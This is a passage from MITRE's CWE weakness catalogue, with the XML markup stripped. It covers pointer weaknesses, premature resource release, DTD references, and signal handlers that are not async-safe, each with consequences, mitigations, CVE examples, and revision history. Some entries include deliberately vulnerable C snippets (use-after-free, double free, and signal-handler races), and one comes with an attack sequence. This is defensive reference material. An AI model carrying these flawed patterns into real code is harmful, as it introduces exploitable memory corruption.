Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships. + + + + CWE Content Team + MITRE + 2010-08-06 + 1.10 + 2010-09-27 + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-23 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product obtains a value from an untrusted source, converts this value to a pointer, and dereferences the resulting pointer. + + An attacker can supply a pointer for memory locations that the product is not expecting. If the pointer is dereferenced for a write operation, the attack might allow modification of critical state variables, cause a crash, or execute code. If the dereferencing operation is for a read, then the attack might allow reading of sensitive data, cause a crash, or set a variable to an unexpected value (since the value will be read from an unexpected memory location). + There are several variants of this weakness, including but not necessarily limited to: + + The untrusted value is directly invoked as a function call. + In OS kernels or drivers where there is a boundary between "userland" and privileged memory spaces, an untrusted pointer might enter through an API or system call (see CWE-781 for one such example). + Inadvertently accepting the value from an untrusted control sphere when it did not have to be accepted as input at all. This might occur when the code was originally developed to be run by a single user in a non-networked environment, and the code is then ported to or otherwise exposed to a networked environment. + + + + + + + + + + + + Confidentiality + Read Memory + If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory. + + + Availability + DoS: Crash, Exit, or Restart + If the untrusted pointer references a memory location that is not accessible to the product, or points to a location that is "malformed" or larger than expected by a read or write operation, the application may terminate unexpectedly. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Modify Memory + If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible. + + + + + CVE-2007-5655 + message-passing framework interprets values in packets as pointers, causing a crash. + https://www.cve.org/CVERecord?id=CVE-2007-5655 + + + CVE-2010-2299 + labeled as a "type confusion" issue, also referred to as a "stale pointer." However, the bug ID says "contents are simply interpreted as a pointer... renderer ordinarily doesn't supply this pointer directly". The "handle" in the untrusted area is replaced in one function, but not another - thus also, effectively, exposure to wrong sphere (CWE-668). + https://www.cve.org/CVERecord?id=CVE-2010-2299 + + + CVE-2009-1719 + Untrusted dereference using undocumented constructor. + https://www.cve.org/CVERecord?id=CVE-2009-1719 + + + CVE-2009-1250 + An error code is incorrectly checked and interpreted as a pointer, leading to a crash. + https://www.cve.org/CVERecord?id=CVE-2009-1250 + + + CVE-2009-0311 + An untrusted value is obtained from a packet and directly called as a function pointer, leading to code execution. + https://www.cve.org/CVERecord?id=CVE-2009-0311 + + + CVE-2010-1818 + Undocumented attribute in multimedia software allows "unmarshaling" of an untrusted pointer. + https://www.cve.org/CVERecord?id=CVE-2010-1818 + + + CVE-2010-3189 + ActiveX control for security software accepts a parameter that is assumed to be an initialized pointer. + https://www.cve.org/CVERecord?id=CVE-2010-3189 + + + CVE-2010-1253 + Spreadsheet software treats certain record values that lead to "user-controlled pointer" (might be untrusted offset, not untrusted pointer). + https://www.cve.org/CVERecord?id=CVE-2010-1253 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains. + Many weaknesses related to pointer dereferences fall under the general term of "memory corruption" or "memory safety." As of September 2010, there is no commonly-used terminology that covers the lower-level variants. + + + + CWE Content Team + MITRE + 2010-09-22 + 1.10 + 2010-09-27 + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer. + + While a pointer can contain a reference to any arbitrary memory location, a program typically only intends to use the pointer to access limited portions of memory, such as contiguous memory used to access an individual array. + Programs may use offsets in order to access fields or sub-elements stored within structured data. The offset might be out-of-range if it comes from an untrusted source, is the result of an incorrect calculation, or occurs because of another error. + If an attacker can control or influence the offset so that it points outside of the intended boundaries of the structure, then the attacker may be able to read or write to memory locations that are used elsewhere in the product. As a result, the attack might change the state of the product as accessed through program variables, cause a crash or instable behavior, and possibly lead to code execution. + + + + + + + + + + + Untrusted pointer offset + This term is narrower than the concept of "out-of-range" offset, since the offset might be the result of a calculation or other error that does not depend on any externally-supplied values. + + + + + Confidentiality + Read Memory + If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory. + + + Availability + DoS: Crash, Exit, or Restart + If the untrusted pointer references a memory location that is not accessible to the program, or points to a location that is "malformed" or larger than expected by a read or write operation, the application may terminate unexpectedly. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Modify Memory + If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + CVE-2010-2160 + Invalid offset in undocumented opcode leads to memory corruption. + https://www.cve.org/CVERecord?id=CVE-2010-2160 + + + CVE-2010-1281 + Multimedia player uses untrusted value from a file when using file-pointer calculations. + https://www.cve.org/CVERecord?id=CVE-2010-1281 + + + CVE-2009-3129 + Spreadsheet program processes a record with an invalid size field, which is later used as an offset. + https://www.cve.org/CVERecord?id=CVE-2009-3129 + + + CVE-2009-2694 + Instant messaging library does not validate an offset value specified in a packet. + https://www.cve.org/CVERecord?id=CVE-2009-2694 + + + CVE-2009-2687 + Language interpreter does not properly handle invalid offsets in JPEG image, leading to out-of-bounds memory access and crash. + https://www.cve.org/CVERecord?id=CVE-2009-2687 + + + CVE-2009-0690 + negative offset leads to out-of-bounds read + https://www.cve.org/CVERecord?id=CVE-2009-0690 + + + CVE-2008-4114 + untrusted offset in kernel + https://www.cve.org/CVERecord?id=CVE-2008-4114 + + + CVE-2010-2873 + "blind trust" of an offset value while writing heap memory allows corruption of function pointer,leading to code execution + https://www.cve.org/CVERecord?id=CVE-2010-2873 + + + CVE-2010-2866 + negative value (signed) causes pointer miscalculation + https://www.cve.org/CVERecord?id=CVE-2010-2866 + + + CVE-2010-2872 + signed values cause incorrect pointer calculation + https://www.cve.org/CVERecord?id=CVE-2010-2872 + + + CVE-2007-5657 + values used as pointer offsets + https://www.cve.org/CVERecord?id=CVE-2007-5657 + + + CVE-2010-2867 + a return value from a function is sign-extended if the value is signed, then used as an offset for pointer arithmetic + https://www.cve.org/CVERecord?id=CVE-2010-2867 + + + CVE-2009-1097 + portions of a GIF image used as offsets, causing corruption of an object pointer. + https://www.cve.org/CVERecord?id=CVE-2009-1097 + + + CVE-2008-1807 + invalid numeric field leads to a free of arbitrary memory locations, then code execution. + https://www.cve.org/CVERecord?id=CVE-2008-1807 + + + CVE-2007-2500 + large number of elements leads to a free of an arbitrary address + https://www.cve.org/CVERecord?id=CVE-2007-2500 + + + CVE-2008-1686 + array index issue (CWE-129) with negative offset, used to dereference a function pointer + https://www.cve.org/CVERecord?id=CVE-2008-1686 + + + CVE-2010-2878 + "buffer seek" value - basically an offset? + https://www.cve.org/CVERecord?id=CVE-2010-2878 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains. + Many weaknesses related to pointer dereferences fall under the general term of "memory corruption" or "memory safety." As of September 2010, there is no commonly-used terminology that covers the lower-level variants. + + + + CWE Content Team + MITRE + 2010-09-22 + 1.10 + 2010-09-27 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accesses or uses a pointer that has not been initialized. + + If the pointer contains an uninitialized value, then the value might not point to a valid memory location. This could cause the product to read from or write to unexpected memory locations, leading to a denial of service. If the uninitialized pointer is used as a function call, then arbitrary functions could be invoked. If an attacker can influence the portion of uninitialized memory that is contained in the pointer, this weakness could be leveraged to execute code or perform other attacks. + Depending on memory layout, associated memory management behaviors, and product operation, the attacker might be able to influence the contents of the uninitialized pointer, thus gaining more fine-grained control of the memory location to be accessed. + + + + + + + + + + + + Confidentiality + Read Memory + If the uninitialized pointer is used in a read operation, an attacker might be able to read sensitive portions of memory. + + + Availability + DoS: Crash, Exit, or Restart + If the uninitialized pointer references a memory location that is not accessible to the product, or points to a location that is "malformed" (such as NULL) or larger than expected by a read or write operation, then a crash may occur. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + If the uninitialized pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + CVE-2010-0211 + chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824). + https://www.cve.org/CVERecord?id=CVE-2010-0211 + + + CVE-2009-2768 + Pointer in structure is not initialized, leading to NULL pointer dereference (CWE-476) and system crash. + https://www.cve.org/CVERecord?id=CVE-2009-2768 + + + CVE-2009-1721 + Free of an uninitialized pointer. + https://www.cve.org/CVERecord?id=CVE-2009-1721 + + + CVE-2009-1415 + Improper handling of invalid signatures leads to free of invalid pointer. + https://www.cve.org/CVERecord?id=CVE-2009-1415 + + + CVE-2009-0846 + Invalid encoding triggers free of uninitialized pointer. + https://www.cve.org/CVERecord?id=CVE-2009-0846 + + + CVE-2009-0040 + Crafted PNG image leads to free of uninitialized pointer. + https://www.cve.org/CVERecord?id=CVE-2009-0040 + + + CVE-2008-2934 + Crafted GIF image leads to free of uninitialized pointer. + https://www.cve.org/CVERecord?id=CVE-2008-2934 + + + CVE-2007-4682 + Access of uninitialized pointer might lead to code execution. + https://www.cve.org/CVERecord?id=CVE-2007-4682 + + + CVE-2007-4639 + Step-based manipulation: invocation of debugging function before the primary initialization function leads to access of an uninitialized pointer and code execution. + https://www.cve.org/CVERecord?id=CVE-2007-4639 + + + CVE-2007-4000 + Unchecked return values can lead to a write to an uninitialized pointer. + https://www.cve.org/CVERecord?id=CVE-2007-4000 + + + CVE-2007-2442 + zero-length input leads to free of uninitialized pointer. + https://www.cve.org/CVERecord?id=CVE-2007-2442 + + + CVE-2007-1213 + Crafted font leads to uninitialized function pointer. + https://www.cve.org/CVERecord?id=CVE-2007-1213 + + + CVE-2006-6143 + Uninitialized function pointer in freed memory is invoked + https://www.cve.org/CVERecord?id=CVE-2006-6143 + + + CVE-2006-4175 + LDAP server mishandles malformed BER queries, leading to free of uninitialized memory + https://www.cve.org/CVERecord?id=CVE-2006-4175 + + + CVE-2006-0054 + Firewall can crash with certain ICMP packets that trigger access of an uninitialized pointer. + https://www.cve.org/CVERecord?id=CVE-2006-0054 + + + CVE-2003-1201 + LDAP server does not initialize members of structs, which leads to free of uninitialized pointer if an LDAP request fails. + https://www.cve.org/CVERecord?id=CVE-2003-1201 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains. + Many weaknesses related to pointer dereferences fall under the general term of "memory corruption" or "memory safety." As of September 2010, there is no commonly-used terminology that covers the lower-level variants. + + + + CWE Content Team + MITRE + 2010-09-22 + 1.10 + 2010-09-27 + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product dereferences a pointer that contains a location for memory that was previously valid, but is no longer valid. + When a product releases memory, but it maintains a pointer to that memory, then the memory might be re-allocated at a later time. If the original pointer is accessed to read or write data, then this could cause the product to read or modify data that is in use by a different function or process. Depending on how the newly-allocated memory is used, this could lead to a denial of service, information exposure, or code execution. + + + + + + + + + + + Dangling pointer + + + + + Confidentiality + Read Memory + If the expired pointer is used in a read operation, an attacker might be able to control data read in by the application. + + + Availability + DoS: Crash, Exit, or Restart + If the expired pointer references a memory location that is not accessible to the product, or points to a location that is "malformed" (such as NULL) or larger than expected by a read or write operation, then a crash may occur. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + If the expired pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible. + + + + + Architecture and Design + Choose a language that provides automatic memory management. + + + Implementation + When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy. + + + + + The following code shows a simple example of a use after free error: + + char* ptr = (char*)malloc (SIZE);if (err) {abrt = 1;free(ptr);}...if (abrt) {logError("operation aborted before commit", ptr);} + + When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function. + + + The following code shows a simple example of a double free error: + + char* ptr = (char*)malloc (SIZE);...if (abrt) {free(ptr);}...free(ptr); + + Double free vulnerabilities have two common (and sometimes overlapping) causes: + + + + Error conditions and other exceptional circumstances + + + Confusion over which part of the program is responsible for freeing the memory + + + + Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once. + + + + + CVE-2008-5013 + access of expired memory address leads to arbitrary code execution + https://www.cve.org/CVERecord?id=CVE-2008-5013 + + + CVE-2010-3257 + stale pointer issue leads to denial of service and possibly other consequences + https://www.cve.org/CVERecord?id=CVE-2010-3257 + + + CVE-2008-0062 + Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), possibly crashing the system or causing heap corruption. + https://www.cve.org/CVERecord?id=CVE-2008-0062 + + + CVE-2007-1211 + read of value at an offset into a structure after the offset is no longer valid + https://www.cve.org/CVERecord?id=CVE-2007-1211 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains. + Many weaknesses related to pointer dereferences fall under the general term of "memory corruption" or "memory safety." As of September 2010, there is no commonly-used terminology that covers the lower-level variants. + + + + CWE Content Team + MITRE + 2010-09-22 + 1.10 + 2010-09-27 + + + CWE Content Team + MITRE + 2011-06-27 + updated Demonstrative_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product releases a resource that is still intended to be used by itself or another actor. + + This weakness focuses on errors in which the product should not release a resource, but performs the release anyway. This is different than a weakness in which the product releases a resource at the appropriate time, but it maintains a reference to the resource, which it later accesses. For this weakness, the resource should still be valid upon the subsequent access. + When a product releases a resource that is still being used, it is possible that operations will still be taken on this resource, which may have been repurposed in the meantime, leading to issues similar to CWE-825. Consequences may include denial of service, information exposure, or code execution. + + + + + + + + Confidentiality + Read Application Data + Read Memory + If the released resource is subsequently reused or reallocated, then a read operation on the original resource might access sensitive data that is associated with a different user or entity. + + + Availability + DoS: Crash, Exit, or Restart + When the resource is released, the software might modify some of its structure, or close associated channels (such as a file descriptor). When the software later accesses the resource as if it is valid, the resource might not be in an expected state, leading to resultant errors that may lead to a crash. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Modify Application Data + Modify Memory + When the resource is released, the software might modify some of its structure. This might affect logic in the sections of code that still assume the resource is active. If the released resource is related to memory and is used in a function call, or points to unexpected data in a write operation, then code execution may be possible upon subsequent accesses. + + + + + CVE-2009-3547 + chain: race condition might allow resource to be released before operating on it, leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-3547 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied and under-reported as of September 2010. This weakness has been reported in high-visibility software, although the focus has been primarily on memory allocation and de-allocation. There are very few examples of this weakness that are not directly related to memory management, although such weaknesses are likely to occur in real-world software for other types of resources. + + + + CWE Content Team + MITRE + 2010-09-22 + 1.10 + 2010-09-27 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not restrict a reference to a Document Type Definition (DTD) to the intended control sphere. This might allow attackers to reference arbitrary DTDs, possibly causing the product to expose files, consume excessive system resources, or execute arbitrary http requests on behalf of the attacker. + + As DTDs are processed, they might try to read or include files on the machine performing the parsing. If an attacker is able to control the DTD, then the attacker might be able to specify sensitive resources or requests or provide malicious content. + For example, the SOAP specification prohibits SOAP messages from containing DTDs. + + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Read Files or Directories + If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system. + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + The DTD may cause the parser to consume excessive CPU cycles or memory using techniques such as nested or recursive entity references (CWE-776). + + + Integrity + Confidentiality + Availability + Access Control + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server's trust relationship with other entities. + + + + + CVE-2010-2076 + Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service. + https://www.cve.org/CVERecord?id=CVE-2010-2076 + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-10-25 + 1.11 + 2010-12-13 + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product defines a signal handler that contains code sequences that are not asynchronous-safe, i.e., the functionality is not reentrant, or it can be interrupted. + + This can lead to an unexpected system state with a variety of potential consequences depending on context, including denial of service and code execution. + Signal handlers are typically intended to interrupt normal functionality of a program, or even other signals, in order to notify the process of an event. When a signal handler uses global or static variables, or invokes functions that ultimately depend on such state or its associated metadata, then it could corrupt system state that is being used by normal functionality. This could subject the program to race conditions or other weaknesses that allow an attacker to cause the program state to be corrupted. While denial of service is frequently the consequence, in some cases this weakness could be leveraged for code execution. + There are several different scenarios that introduce this issue: + + Invocation of non-reentrant functions from within the handler. One example is malloc(), which modifies internal global variables as it manages memory. Very few functions are actually reentrant. + Code sequences (not necessarily function calls) contain non-atomic use of global variables, or associated metadata or structures, that can be accessed by other functionality of the program, including other signal handlers. Frequently, the same function is registered to handle multiple signals. + The signal handler function is intended to run at most one time, but instead it can be invoked multiple times. This could happen by repeated delivery of the same signal, or by delivery of different signals that have the same handler function (CWE-831). + + Note that in some environments or contexts, it might be possible for the signal handler to be interrupted itself. + If both a signal handler and the normal behavior of the product have to operate on the same set of state variables, and a signal is received in the middle of the normal execution's modifications of those variables, the variables may be in an incorrect or corrupt state during signal handler execution, and possibly still incorrect or corrupt upon return. + + + + + + + Integrity + Confidentiality + Availability + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + The most common consequence will be a corruption of the state of the product, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure. + + + + + Implementation + Architecture and Design + + Eliminate the usage of non-reentrant functionality inside of signal handlers. This includes replacing all non-reentrant library calls with reentrant calls. + Note: This will not always be possible and may require large portions of the product to be rewritten or even redesigned. Sometimes reentrant-safe library alternatives will not be available. Sometimes non-reentrant interaction between the state of the system and the signal handler will be required by design. + + High + + + Implementation + Where non-reentrant functionality must be leveraged within a signal handler, be sure to block or mask signals appropriately. This includes blocking other signals within the signal handler itself that may also leverage the functionality. It also includes blocking all signals reliant upon the functionality when it is being accessed or modified by the normal behaviors of the product. + + + + + This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits. + + char *logMessage; + void handler (int sigNum) { + syslog(LOG_NOTICE, "%s\n", logMessage);free(logMessage); + /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ + + sleep(10);exit(0); + } + int main (int argc, char* argv[]) { + logMessage = strdup(argv[1]); + /* Register signal handlers. */ + + signal(SIGHUP, handler);signal(SIGTERM, handler); + /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ + + sleep(10); + } + + The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines: + + + + The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM. + + + The program begins its "normal" functionality, which is simplified as sleep(), but could be any functionality that consumes some time. + + + The attacker sends SIGHUP, which invokes handler (call this "SIGHUP-handler"). + + + SIGHUP-handler begins to execute, calling syslog(). + + + syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap. + + + The attacker then sends SIGTERM. + + + SIGHUP-handler is interrupted, but syslog's malloc call is still executing and has not finished modifying its metadata. + + + The SIGTERM handler is invoked. + + + SIGTERM-handler records the log message using syslog(), then frees the logMessage variable. + + + + At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running. + Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution. + Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array. + + + The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting. + + #include <signal.h>#include <syslog.h>#include <string.h>#include <stdlib.h> + void *global1, *global2;char *what;void sh (int dummy) { + syslog(LOG_NOTICE,"%s\n",what);free(global2);free(global1); + /* Sleep statements added to expand timing window for race condition */ + + sleep(10);exit(0); + } + int main (int argc,char* argv[]) { + what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh); + /* Sleep statements added to expand timing window for race condition */ + + sleep(10);exit(0); + } + + However, the following sequence of events may result in a double-free (CWE-415): + + + + a SIGHUP is delivered to the process + + + sh() is invoked to process the SIGHUP + + + This first invocation of sh() reaches the point where global1 is freed + + + At this point, a SIGTERM is sent to the process + + + the second invocation of sh() might do another free of global1 + + + this results in a double-free (CWE-415) + + + + This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within "Delivering Signals for Fun and Profit" [REF-360]. + + + + + CVE-2008-4109 + Signal handler uses functions that ultimately call the unsafe syslog/malloc/s*printf, leading to denial of service via multiple login attempts + https://www.cve.org/CVERecord?id=CVE-2008-4109 + + + CVE-2006-5051 + Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition (CWE-362) that leads to a double free (CWE-415). + https://www.cve.org/CVERecord?id=CVE-2006-5051 + + + CVE-2001-1349 + unsafe calls to library functions from signal handler + https://www.cve.org/CVERecord?id=CVE-2001-1349 + + + CVE-2004-0794 + SIGURG can be used to remotely interrupt signal handler; other variants exist. + https://www.cve.org/CVERecord?id=CVE-2004-0794 + + + CVE-2004-2259 + SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free. + https://www.cve.org/CVERecord?id=CVE-2004-2259 + + + CVE-2002-1563 + SIGCHLD not blocked in a daemon loop while counter is modified, causing counter to get out of sync. + https://www.cve.org/CVERecord?id=CVE-2002-1563 + + + + + SIG31-C + Do not access or modify shared objects in signal handlers + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-11-08 + 1.11 + 2010-12-13 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2017-11-08 + updated Observed_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE 